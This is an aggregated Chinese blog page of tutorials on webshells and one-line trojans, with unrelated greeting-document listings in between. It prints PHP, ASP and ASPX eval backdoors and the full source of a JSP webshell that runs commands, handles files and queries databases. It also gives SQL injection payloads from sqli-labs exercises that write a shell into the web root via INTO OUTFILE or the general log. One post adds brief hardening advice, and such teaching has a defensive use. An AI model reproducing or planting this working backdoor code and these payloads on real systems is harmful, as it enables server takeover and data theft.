-
2019-06-23 14:36:08
webshell
可理解为web+shell 通常就是大佬所说的大马
web就是指web页面,shell就是命令执行环境。webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起,然后就可以使用浏览器来访问该后门文件了,从而得到一个命令执行环境,以达到控制网站服务器的目的。
webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。
一方面,webshell被站长常常用于网站管理、服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。
另一方面,被入侵者利用,从而达到控制网站服务器的目的。这些网页脚本常称为Web脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。
一句话木马
通常就是人们常说的小马
简单来说一句话木马就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell的方法。对于不同的语言有不同的构造方法,基本构造是首先出现的是脚本开始的标记,后边跟着的 eval 或者是 execute 是核心部分,就是获取并执行后边得到的内容,而后边得到的内容,是 request 或者是 $_POST 获取的值。如果我们通过客户端向服务器发送,那么就会让服务器执行我们发送的脚本,挂马就实现了。
不同语言的一句话木马:
php一句话木马: <?php @eval($_POST[value]); ?> asp一句话木马: <%eval request ("value")%> 或 <% execute(request("value")) %> aspx一句话木马: <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %> <?php fputs( fopen('xie.php','w') , '<? php eval($_POST[xie]) ?>' ) ; ?> 将当前目录下创建xie.php文件,并且将一句话木马写入xd.php中
jsp的一句话木马会比较长,有点特殊
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> <%!String Pwd = "pass"; //菜刀连接密码 String EC(String s, String c) throws Exception { return s; }//new String(s.getBytes("ISO-8859-1"),c);} Connection GC(String s) throws Exception { String[] x = s.trim().split("\r\n"); Class.forName(x[0].trim()).newInstance(); Connection c = DriverManager.getConnection(x[1].trim()); if (x.length > 2) { c.setCatalog(x[2].trim()); } return c; } void AA(StringBuffer sb) throws Exception { File r[] = File.listRoots(); for (int i = 0; i < r.length; i++) { sb.append(r[i].toString().substring(0, 2)); } } void BB(String s, StringBuffer sb) throws Exception { File oF = new File(s), l[] = oF.listFiles(); String sT, sQ, sF = ""; java.util.Date dt; SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); for (int i = 0; i < l.length; i++) { dt = new java.util.Date(l[i].lastModified()); sT = fm.format(dt); sQ = l[i].canRead() ? "R" : ""; sQ += l[i].canWrite() ? " W" : ""; if (l[i].isDirectory()) { sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n"); } else { sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n"; } } sb.append(sF); } void EE(String s) throws Exception { File f = new File(s); if (f.isDirectory()) { File x[] = f.listFiles(); for (int k = 0; k < x.length; k++) { if (!x[k].delete()) { EE(x[k].getPath()); } } } f.delete(); } void FF(String s, HttpServletResponse r) throws Exception { int n; byte[] b = new byte[512]; r.reset(); ServletOutputStream os = r.getOutputStream(); BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); os.write(("->" + "|").getBytes(), 0, 3); while ((n = is.read(b, 0, 512)) != -1) { os.write(b, 0, n); } os.write(("|" + "<-").getBytes(), 0, 3); os.close(); is.close(); } void GG(String s, String d) throws Exception { String h = "0123456789ABCDEF"; int n; File f = new File(s); f.createNewFile(); FileOutputStream os = new FileOutputStream(f); for (int i = 0; i < d.length(); i += 2) { os .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d .charAt(i + 1)))); } os.close(); } void HH(String s, String d) throws Exception { File sf = new File(s), df = new File(d); if (sf.isDirectory()) { if (!df.exists()) { df.mkdir(); } File z[] = sf.listFiles(); for (int j = 0; j < z.length; j++) { HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); } } else { FileInputStream is = new FileInputStream(sf); FileOutputStream os = new FileOutputStream(df); int n; byte[] b = new byte[512]; while ((n = is.read(b, 0, 512)) != -1) { os.write(b, 0, n); } is.close(); os.close(); } } void II(String s, String d) throws Exception { File sf = new File(s), df = new File(d); sf.renameTo(df); } void JJ(String s) throws Exception { File f = new File(s); f.mkdir(); } void KK(String s, String t) throws Exception { File f = new File(s); SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); java.util.Date dt = fm.parse(t); f.setLastModified(dt.getTime()); } void LL(String s, String d) throws Exception { URL u = new URL(s); int n; FileOutputStream os = new FileOutputStream(d); HttpURLConnection h = (HttpURLConnection) u.openConnection(); InputStream is = h.getInputStream(); byte[] b = new byte[512]; while ((n = is.read(b, 0, 512)) != -1) { os.write(b, 0, n); } os.close(); is.close(); h.disconnect(); } void MM(InputStream is, StringBuffer sb) throws Exception { String l; BufferedReader br = new BufferedReader(new InputStreamReader(is)); while ((l = br.readLine()) != null) { sb.append(l + "\r\n"); } } void NN(String s, StringBuffer sb) throws Exception { Connection c = GC(s); ResultSet r = c.getMetaData().getCatalogs(); while (r.next()) { sb.append(r.getString(1) + "\t"); } r.close(); c.close(); } void OO(String s, StringBuffer sb) throws Exception { Connection c = GC(s); String[] t = { "TABLE" }; ResultSet r = c.getMetaData().getTables(null, null, "%", t); while (r.next()) { sb.append(r.getString("TABLE_NAME") + "\t"); } r.close(); c.close(); } void PP(String s, StringBuffer sb) throws Exception { String[] x = s.trim().split("\r\n"); Connection c = GC(s); Statement m = c.createStatement(1005, 1007); ResultSet r = m.executeQuery("select * from " + x[3]); ResultSetMetaData d = r.getMetaData(); for (int i = 1; i <= d.getColumnCount(); i++) { sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i) + ")\t"); } r.close(); m.close(); c.close(); } void QQ(String cs, String s, String q, StringBuffer sb) throws Exception { int i; Connection c = GC(s); Statement m = c.createStatement(1005, 1008); try { ResultSet r = m.executeQuery(q); ResultSetMetaData d = r.getMetaData(); int n = d.getColumnCount(); for (i = 1; i <= n; i++) { sb.append(d.getColumnName(i) + "\t|\t"); } sb.append("\r\n"); while (r.next()) { for (i = 1; i <= n; i++) { sb.append(EC(r.getString(i), cs) + "\t|\t"); } sb.append("\r\n"); } r.close(); } catch (Exception e) { sb.append("Result\t|\t\r\n"); try { m.executeUpdate(q); sb.append("Execute Successfully!\t|\t\r\n"); } catch (Exception ee) { sb.append(ee.toString() + "\t|\t\r\n"); } } m.close(); c.close(); }%> <% String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + ""; request.setCharacterEncoding(cs); response.setContentType("text/html;charset=" + cs); String Z = EC(request.getParameter(Pwd) + "", cs); String z1 = EC(request.getParameter("z1") + "", cs); String z2 = EC(request.getParameter("z2") + "", cs); StringBuffer sb = new StringBuffer(""); try { sb.append("->" + "|"); if (Z.equals("A")) { String s = new File(application.getRealPath(request .getRequestURI())).getParent(); sb.append(s + "\t"); if (!s.substring(0, 1).equals("/")) { AA(sb); } } else if (Z.equals("B")) { BB(z1, sb); } else if (Z.equals("C")) { String l = ""; BufferedReader br = new BufferedReader( new InputStreamReader(new FileInputStream(new File( z1)))); while ((l = br.readLine()) != null) { sb.append(l + "\r\n"); } br.close(); } else if (Z.equals("D")) { BufferedWriter bw = new BufferedWriter( new OutputStreamWriter(new FileOutputStream( new File(z1)))); bw.write(z2); bw.close(); sb.append("1"); } else if (Z.equals("E")) { EE(z1); sb.append("1"); } else if (Z.equals("F")) { FF(z1, response); } else if (Z.equals("G")) { GG(z1, z2); sb.append("1"); } else if (Z.equals("H")) { HH(z1, z2); sb.append("1"); } else if (Z.equals("I")) { II(z1, z2); sb.append("1"); } else if (Z.equals("J")) { JJ(z1); sb.append("1"); } else if (Z.equals("K")) { KK(z1, z2); sb.append("1"); } else if (Z.equals("L")) { LL(z1, z2); sb.append("1"); } else if (Z.equals("M")) { String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; Process p = Runtime.getRuntime().exec(c); MM(p.getInputStream(), sb); MM(p.getErrorStream(), sb); } else if (Z.equals("N")) { NN(z1, sb); } else if (Z.equals("O")) { OO(z1, sb); } else if (Z.equals("P")) { PP(z1, sb); } else if (Z.equals("Q")) { QQ(cs, z1, z2, sb); } } catch (Exception e) { sb.append("ERROR" + ":// " + e.toString()); } sb.append("|" + "<-"); out.print(sb.toString()); %>
更多相关内容 -
学习总结-工作心得一句话简短.docx
2021-12-03 08:46:18学习总结-工作心得一句话简短.docx -
学习总结-工作心得一句话简短2020.docx
2021-12-03 08:46:20学习总结-工作心得一句话简短2020.docx -
星期一早安问候语简短一句话
2021-08-19 14:25:51星期一早安问候语简短一句话 -
大学毕业寄语简短一句话.docx
2021-11-05 08:31:10大学毕业寄语简短一句话.docx -
小学毕业寄语简短一句话.doc
2021-09-29 07:32:02小学毕业寄语简短一句话.doc -
简短心情说说短语-简短的一句话心情说说.docx
2022-01-23 19:34:10简短心情说说短语-简短的一句话心情说说.docx -
星期三早安问候语简短一句话
2021-08-19 14:33:31星期三早安问候语简短一句话 -
孩子期末考试祝福语简短一句话
2021-08-19 09:40:31孩子期末考试祝福语简短一句话 -
备战期末考试祝福语简短一句话
2021-08-19 09:39:38备战期末考试祝福语简短一句话 -
简短英文一句话格言参考.doc
2021-09-17 07:42:01简短英文一句话格言参考.doc -
大学期末考试祝福语简短一句话.docx
2021-10-19 19:32:05大学期末考试祝福语简短一句话.docx -
2021年中考励志标语简短一句话大全.docx
2021-11-13 09:05:112021年中考励志标语简短一句话大全.docx -
【祝福语】朋友生日祝福语简短一句话.doc
2021-11-13 08:51:16【祝福语】朋友生日祝福语简短一句话.doc -
【祝福语】大寒祝福语简短一句话2021.doc
2021-11-13 08:46:12【祝福语】大寒祝福语简短一句话2021.doc -
毕业感言一句话10字[高中毕业感言简短].pdf
2022-05-05 20:42:07精品资料 欢精品资料 欢迎下载迎下载 -
【木小禾素材】100条走心的句子简短一句话
2021-09-02 15:12:27【木小禾素材】100条走心的句子简短一句话 -
大学新生迎新祝福语一句话2021-大学迎新祝福语简短句子最新大全.docx
2021-11-07 01:42:24大学新生迎新祝福语一句话2021-大学迎新祝福语简短句子最新大全.docx -
plan-todos:一句话笔记
2021-04-29 19:36:49此应用程序的简短介绍可以轻松地转到此处。 先决条件 您需要在计算机上正确安装以下物品。 (使用npm) 安装 git clone 此存储库 cd plan-todos npm install 运行/开发 ember serve 访问您的应用程序,为 。 ... -
简短几句jquery代码的实现一个图片向上滚动切换
2021-01-19 17:47:05该方法通过CSS样式将元素从一个状态改变为另一个状态。CSS属性值是逐渐改变的,这样就可以创建动画效果。 只有数字值可创建动画(比如 “margin:30px”)。字符串值无法创建动画(比如 “background-color:red”)... -
一句话木马与大马
2021-08-03 22:39:200x00 大马与小马 通常为了获取权限我们会...一句话木马是一种基于B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注0x00 大马与小马
通常为了获取权限我们会采取给网站挂马形式,例如通过注入写入,一句话木马简称小马,成功注入后可以获取到基本的getshell,而大马,顾名思义,威力也比小马要厉害很多,通常可以通过给网站挂入小马获取getshell后上传大马,获取到更多的高级权限操作等等。
0x01 sql注入之一句话木马
首先介绍一句话木马:
一句话木马是一种基于B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注入非法信息等的目的。
常见脚本的一句话木马:
php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>
注入案例:?id=-1’)) union select 1,2,’<%eval request (“pass”)%>’ into outfile ‘D:\phpstudy_pro\WWW\sqli\Less-7\00.asp’–+
注入条件
1.知道网站绝对路径
2,需要有数据库读写权限,在mysql 中通过命令查看当前状态网站开启secure_file_priv开关需要是打开状态
secure_file_priv的状态有三种可能有三种状态测试语句:show variables like ‘%secure%’;
1.null 无法写入和读取
2.设置为一个目录名字,只允许在该路径下导入导出。
3.‘’空,可以在任意位置读取和写入
3.如secure_file_priv结果不为空值,通过修改数据库ini文件加上语句secure_file_priv= #文件中
或
[mysqld] secure_file_priv="" #文件尾
测试注入
这里实验sqli-less-7利用文件上传写入一句话木马并且连接
1)测试后发现闭合状态为 ?id=1‘)) 字段数为3
2) 检测数据读写权限,打开数据库输入测试语句show variables like'%secure%'
结果显示为不可读写,通过添加语句secure_file_priv=到数据库ini文件再次重启数据库后再次查询权限显示权限已经打开
3)写入php一句话木马到网站关卡文件夹(此处因为已经知道测试环境的绝对地址,故省略地址爆破)
本人总结路劲获取方法有:
报错显示
遗留文件:php网站(phpinfo.php)
漏洞报错(网上查询中间件爆路径)
平台配置文件(通过读取配置select load_file(‘c:/路径’)文件) 爆破等
> 数据库下注入语句:select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\\phpstudy_pro\\WWW\\sqli\\Less-7\\shell.php"; url注入语句:http://127.0.0.1/sql1/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["pass"]);?>' into outfile "E:\\phpstudy_pro\\WWW\\sql1\\Less-7\\shell.php"--+
*此处文件地址添加两条杠防止被转义
3)使用getshell工具菜刀连接
连接地址http://192.168.0.104/sqli/Less-7/shell.php 本地:http://127.0.0.1/sqli/Less-7/shell.php
0x02 大马
获取到网站getshell权限后上传相关脚本的大马,
访问大马,输入相关的密码,
挂马虽好,不要贪杯
-
sql注入与一句话木马
2021-07-08 15:25:040x00 sql注入之一句话木马 首先介绍一下一句话木马: 一句话木马是一种基于 B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站...0x00 sql注入之一句话木马
首先介绍一下一句话木马:
一句话木马是一种基于
B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注入非法信息等的目的。常见脚本的一句话木马:
php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>
0x01 注入条件
1.知道网站绝对路径
2,在mysql 中通过命令查看当前状态网站开启secure_file_priv开关需要是打开状态
secure_file_priv的状态有三种可能有三种状态测试语句:show variables like’%secure%’
1.null 无法写入和读取
2.设置为一个目录名字,只允许在该路径下导入导出。
3.‘’空,可以在任意位置读取和写入
如secure_file_priv结果不为空值,通过修改数据库ini文件加上语句secure_file_priv= #文件中
或
[mysqld] secure_file_priv="" #文件尾
0x02 测试注入
这里实验sqli-less-7利用文件上传写入一句话木马并且连接
1)测试后发现闭合状态为?id=1‘)) 字段数为3
2) 检测数据读写权限,打开数据库属于测试语句show variables like'%secure%'
结果显示为不可读写,通过添加语句secure_file_priv=到数据库ini文件再次重启数据库显示权限已经打开
3)写入php一句话木马到网站关卡文件夹(此处因为已经知道测试环境的绝对地址,故省略地址爆破)
> 数据库下注入语句:select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\\phpstudy_pro\\WWW\\sqli\\Less-7\\shell.php";
url注入语句:http://127.0.0.1/sql1/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["pass"]);?>' into outfile "E:\\phpstudy_pro\\WWW\\sql1\\Less-7\\shell.php"--+
此处文件地址添加两条杠防止被转义
3)使用getshell工具菜刀连接
连接地址http://192.168.0.104/sqli/Less-7/shell.php 本地:http://127.0.0.1/sqli/Less-7/shell.php
-
【亮剑】一句话招聘 v1.0.3
2014-10-29 01:51:07为此我们开发了支持发布简短信息的招聘插件---"一句话招聘"和"一句话求职"。 1.支持发布招聘信息,允许设置积分消耗功能 2.支持发布求职信息 3.首页支持滚动 4.支持搜索 5.支持信息置顶功能,允许设置积分消耗功能 6.... -
SQL注入上传一句话木马
2021-05-31 16:59:14利用sql注入上传一句话木马导读1. sql注入的危害2. 文件写入2.1 webshell和一句话木马webshell(大马)一句话木马木马文件的危害2.2 文件写入的前提条件2.3 写入函数2.4 怎么找网站根目录(绝对路径)2.5 只能与回显...利用sql注入上传一句话木马
导读
本文主要介绍了利用sql漏洞上传文件的一些知识。在利用sql注入漏洞上传文件的时候我们需要知道
- 被上传的网页 在web服务器的路径
- 上传文件要获取哪些权限,也就是有哪些前提条件
- 上传的文件中我们应该写什么内容,也就是如何写木马程序
- 上传之后会对服务器造成哪些危害,应该怎么防护
1. sql注入的危害
- 获取数据—读数据库,读系统文件
- 文件操作
- 执行系统命令
- 改注册表
2. 文件写入
掌握利用写入函数写入shell
掌握利用日志文件写入shell
主要是文件写入 与 下载
2.1 webshell、一句话木马、后门
个人理解
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。对于网站管理员来说,webshell就是一个工具,可以用来管理服务器,系统权限。
- 对于攻击者而言,上传木马文件的过程就是 getshell 的过程,
- 攻击者上传payload并成功执行后,可以看到网站后台目录,能够进行网站服务器的管控,权限的管控,此过程就是获取webshell。
- 上传 payload 之后,下次通过上传的 payload ,借用Cknife,蚁剑等工具直接连接到网站,对后台进行管控,以此造成持续化的攻击,此过程就是留后门的过程。
webshell(大马)
webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。
黑客在入侵了一个网站后,通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起,然后就可以使用浏览器来访问该后门文件了,从而得到一个命令执行环境,以达到控制网站服务器的目的。
顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。
一方面,webshell被站长常常用于网站管理、服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。
一句话木马
一句话木马就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell的方法
一句话木马还可以与sql注入漏洞结合使用,利用回显注入,将一句话木马写入网页的根目录。
php一句话木马: <?php @eval($_POST[value]); ?> // @ 表示即使报错也会继续执行 asp一句话木马: <%eval request ("value")%> 或 <% execute(request("value")) %> aspx一句话木马: <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %> //eval 和 execute 表示获取并执行后面的内容 <?php fputs( fopen('xie.php','w') , '<? php eval($_POST[xie]) ?>' ) ; ?> 将当前目录下创建xie.php文件,并且将一句话木马写入xd.php中
成功执行一句话木马的条件
- 木马成功上传,未被拦截
- 攻击者可以获取网页的整个目录,也就是要知道木马的路径
- 上传木马文件可以被web服务器执行
木马文件的危害
- 可以获取被感染主机的敏感数据
- 占用系统CPU资源等,甚至导致系统故障
- 对被感染主机进行更改密码,删除文件,修改注册表
2.2 文件写入的前提条件
- 有网站的绝对路径 – 怎么找
2.mysql服务对网站的网络路径有 写权限- 文件夹权限;文件权限;用户权限
- secure_ file _ priv=’’ 表示不允许写入或导出
- 启动phpstudy,在my.ini中添加此句
- mysql连接用户有file权限
- 未对sql语句进行转义
2.3 写入函数
outfile;dumpfile select * from user into outfile "d:\\1.php" select * from user into dumpfile "d:\\1.php" show variables like '%secure%' //查看 secure-file-priv 当前的值
2.4 怎么找网站根目录(绝对路径)
必须上传到网站根目录,否则无法执行
-
根据泄露的信息
输入域名例如:127.0.0.1/123.php
-
手工报错信息
响应包中可能会出现此类信息
-
根据经验,对Apache,linux,iis的了解
2.5 只能与回显注入结合
id=-1' union select 1,"<?php eval($_POST['aaa']);?>",3 into OUTFILE 'd:\\1.php' --+ -- sql-libs less-1 为例
然后打开D盘,发现 1.php 成功写入
经过测试,与报错注入,盲注结合,得不到想要的结果
因此无法利用报错注入和盲注进行文件上传到服务器
2.6 日志写文件
日志也是文件,因此可以将一句话木马写入日志
-
首先查看日志权限,开启文件权限
show variables like '%general%' //查看日志权限 set GLOBAL general_log=1 //开启文件权限 set GLOBAL general_log_file='d:\\路径' //改变日志地址
-
LAPTOP-NDINB3J0.log 会记录每一条查询语句,因此先将记录日志的文件改掉,然后再对此文件写入木马
关键点:知道根目录的路径 和 命令要被执行
2.7 文件读取
前提条件
- 有读取文件的绝对路径
- mysql服务对路径有读的权限
- mysql连接用户有file权限
- secure_file_priv=’’
读取函数
-
读取数据函数 load_file(<‘绝对路径’>)
select load_file('d:\\1.php')
2.8 针对文件写入的防护
-
权限最小化
例如: secure-file-priv
linux中 的读写执行权限的设置 -
功能最小化—把不需要的端口关闭
例如 ftp,telnet等端口
-
服务最小化
-
添加过滤
-
预编译
-
boss直聘一句话介绍优势_Boss直聘大学生如何快速找到工作
2020-11-18 23:49:41Boss直聘大学生如何快速找到工作首先第一步做一份你要找的工作简历传到BOSS直聘软件上(简历比较安全,企业方每次索取你的简历是需要你同意)、填写好自己在BOSS直聘上的微简历(简历很重要,一定要把自己擅长的都学... -
Webshell和一句话木马
2020-02-09 16:25:12黑客在入侵了一个网站后,很多人通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起,然后就可以使用浏览器来访问该后门文件了,从而得到一个命令执行环境,以达到控制网站服务器的... -
安卓实现每日一句功能-一言API调用
2021-06-21 09:49:16简单来说,一言指的就是一句话,可以是动漫中的台词,也可以是网络上的各种小段子。 或是感动,或是开心,有或是单纯的回忆。来到这里,留下你所喜欢的那一句句话,与大家分享,这就是一言存在的目的。 一言API的... -
终于找到组织了后半句_如何对组织的目的进行一句话描述
2020-07-11 23:05:19终于找到组织了后半句 我的职业生涯始于汽车行业,当时是培训经销商零售销售人员。 在每次研讨会之前,我都会一对一询问每个汽车销售人员,他们认为自己的工作是什么(即涉及的具体任务)以及他们认为“成功的一天”... -
给程序员的一句话祝福语
2021-03-14 16:29:02给程序员的一句话祝福语在生活、工作和学习中,大家都用到过祝福语吧,祝福语是人们表达心中祝福的话语。那么要怎样才能写得出好的祝福语呢?下面是小编收集整理的给程序员的一句话祝福语,仅供参考,欢迎大家阅读。...